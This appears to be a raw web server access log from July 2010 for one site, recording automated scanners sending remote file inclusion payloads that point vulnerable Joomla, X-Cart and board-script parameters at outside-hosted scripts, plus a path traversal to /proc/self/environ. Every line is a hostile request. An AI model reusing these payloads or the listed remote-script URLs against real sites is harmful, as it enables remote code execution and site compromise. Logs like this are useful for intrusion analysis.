110.45.144.106 - - [01/Jul/2010:05:45:12 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
210.57.208.27 - - [01/Jul/2010:05:46:06 -0700] "GET /?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.de-construction.com"
210.57.208.27 - - [01/Jul/2010:05:46:06 -0700] "GET /logs/access_100531.log//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.57.208.27 - - [01/Jul/2010:05:46:06 -0700] "GET /logs//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1372 "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:06:02:37 -0700] "GET /logs/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:06:02:37 -0700] "GET /logs/access.log/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:06:02:37 -0700] "GET /components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:06:02:52 -0700] "GET /components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:06:02:52 -0700] "GET /logs/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:06:02:52 -0700] "GET /logs/access.log/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:06:03:03 -0700] "GET /logs/access.log/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:06:03:03 -0700] "GET /logs/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
93.186.192.124 - - [01/Jul/2010:06:03:03 -0700] "GET /components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.144.106 - - [01/Jul/2010:06:05:38 -0700] "GET /logs/access_100531.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
110.45.144.106 - - [01/Jul/2010:06:05:44 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
110.45.144.106 - - [01/Jul/2010:06:05:50 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
114.200.199.236 - - [01/Jul/2010:06:17:10 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.drpepi.com//ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
114.200.199.236 - - [01/Jul/2010:06:17:10 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.drpepi.com//ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
114.200.199.236 - - [01/Jul/2010:06:17:11 -0700] "GET /logs/access.log//skin/happycast_category_lightblack/login.php?dir=http://www.drpepi.com//ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
217.150.245.14 - - [01/Jul/2010:06:19:57 -0700] "GET /components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
217.150.245.14 - - [01/Jul/2010:06:19:57 -0700] "GET /logs/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
217.150.245.14 - - [01/Jul/2010:06:19:57 -0700] "GET /logs/access.log/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:06:21:29 -0700] "GET /logs/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:06:21:29 -0700] "GET /logs/access.log/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:06:21:29 -0700] "GET /components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.91.67.17 - - [01/Jul/2010:06:23:59 -0700] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:06:28:22 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onlinegamerlive.com/xcf/idxx.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:06:28:22 -0700] "GET /logs/access_100601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onlinegamerlive.com/xcf/idxx.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:06:28:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onlinegamerlive.com/xcf/idxx.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:06:29:12 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onlinegamerlive.com/xcf/idxx.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:06:29:12 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onlinegamerlive.com/xcf/idxx.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:06:29:12 -0700] "GET /logs/access_100601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.onlinegamerlive.com/xcf/idxx.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:29:47 -0700] "GET /logs//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:29:47 -0700] "GET /admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:30:29 -0700] "GET /admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:30:29 -0700] "GET /admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:30:30 -0700] "GET /admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:30:37 -0700] "GET /admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:30:43 -0700] "GET /logs//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:30:43 -0700] "GET /admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:31:14 -0700] "GET /logs//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:31:14 -0700] "GET /admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:31:33 -0700] "GET /logs//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:31:34 -0700] "GET /admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:06:32:22 -0700] "GET /admin/auth.php?xcart_dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
195.190.166.35 - - [01/Jul/2010:06:34:54 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
195.190.166.35 - - [01/Jul/2010:06:34:54 -0700] "GET /logs/access_100601.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
195.190.166.35 - - [01/Jul/2010:06:34:54 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
195.190.166.35 - - [01/Jul/2010:06:35:42 -0700] "GET /logs/access_100331.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:06:36:56 -0700] "GET /admin/auth.php?xcart_dir=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:06:36:56 -0700] "GET /logs//admin/auth.php?xcart_dir=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:06:36:56 -0700] "GET /logs/access_100601.log%20%20//admin/auth.php?xcart_dir=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
193.231.187.33 - - [01/Jul/2010:06:38:49 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
193.231.187.33 - - [01/Jul/2010:06:38:49 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
193.231.187.33 - - [01/Jul/2010:06:40:38 -0700] "GET /logs/access_100601.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
81.208.34.38 - - [01/Jul/2010:06:40:41 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
81.208.34.38 - - [01/Jul/2010:06:40:41 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
81.208.34.38 - - [01/Jul/2010:06:40:41 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.projectmoneygenerator.com/css/us/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:41:43 -0700] "GET /logs/access_100601.log//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:41:43 -0700] "GET /admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:41:43 -0700] "GET /logs//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:42:10 -0700] "GET /logs/access_100601.log//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:42:10 -0700] "GET /admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:42:10 -0700] "GET /logs//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:42:18 -0700] "GET /logs/access_100601.log//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:42:18 -0700] "GET /admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:42:18 -0700] "GET /logs//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:06:42:20 -0700] "GET /logs/access_100501.log////skin/ggambo7002_board/comment_modify.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:06:42:20 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:06:42:21 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
216.104.40.170 - - [01/Jul/2010:06:42:33 -0700] "GET /logs/access_100501.log////skin/ggambo7002_board/comment_modify.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
216.104.40.170 - - [01/Jul/2010:06:42:33 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
216.104.40.170 - - [01/Jul/2010:06:42:33 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:06:43:28 -0700] "GET /logs/access_100601.log//admin/auth.php?xcart_dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:06:43:29 -0700] "GET /admin/auth.php?xcart_dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:06:43:29 -0700] "GET /logs//admin/auth.php?xcart_dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:44:35 -0700] "GET /logs/access_100601.log//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:44:35 -0700] "GET /admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:44:35 -0700] "GET /logs//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
216.104.40.170 - - [01/Jul/2010:06:45:42 -0700] "GET /logs/access_100531.log////skin/ggambo7002_board/comment_modify.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:06:46:57 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:06:46:57 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:06:48:04 -0700] "GET /logs/access_100601.log//admin/auth.php?xcart_dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:06:48:04 -0700] "GET /admin/auth.php?xcart_dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:06:48:04 -0700] "GET /logs//admin/auth.php?xcart_dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
89.212.6.4 - - [01/Jul/2010:06:49:19 -0700] "GET /skin/zero_vote/error.php?dir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.212.6.4 - - [01/Jul/2010:06:49:19 -0700] "GET /logs/access_100601.log%20%20//skin/zero_vote/error.php?dir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.212.6.4 - - [01/Jul/2010:06:49:19 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.212.6.4 - - [01/Jul/2010:06:49:37 -0700] "GET /skin/zero_vote/error.php?dir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.212.6.4 - - [01/Jul/2010:06:49:37 -0700] "GET /logs/access_100601.log%20%20//skin/zero_vote/error.php?dir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.212.6.4 - - [01/Jul/2010:06:49:37 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:06:51:52 -0700] "GET /logs/access_100601.log//admin/auth.php?xcart_dir=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:55:30 -0700] "GET /logs/access_100401.log//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:56:19 -0700] "GET /logs/access_100401.log//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:56:53 -0700] "GET /logs/access_100401.log//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:06:57:43 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:06:57:43 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:06:57:43 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:06:58:04 -0700] "GET /logs/access_100501.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:06:58:13 -0700] "GET /logs/access_100531.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.71.245.122 - - [01/Jul/2010:06:58:42 -0700] "GET /logs/access_100401.log//admin/auth.php?xcart_dir=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
89.212.6.4 - - [01/Jul/2010:07:03:15 -0700] "GET /logs/access_100601.log//skin/zero_vote/error.php?dir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.212.6.4 - - [01/Jul/2010:07:03:16 -0700] "GET /logs/access_100601.log//skin/zero_vote/error.php?dir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:07:03:56 -0700] "GET /logs/access_100401.log//admin/auth.php?xcart_dir=http://yourbestdate.info/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:07:06:17 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:07:06:17 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:07:06:18 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:07:06:56 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:07:06:56 -0700] "GET /logs/access.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:07:06:56 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:07:08:03 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:07:08:03 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [01/Jul/2010:07:08:03 -0700] "GET /logs/access_100531.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:10:54 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:10:54 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:10:54 -0700] "GET /skin/zero_vote/error.php?dir=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:12:03 -0700] "GET /skin/zero_vote/error.php?dir=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:12:03 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.188.130.113 - - [01/Jul/2010:07:12:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://ucc.mygo.co.kr//data/session/su?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.171.37.206 - - [01/Jul/2010:07:12:41 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
213.171.37.206 - - [01/Jul/2010:07:12:41 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
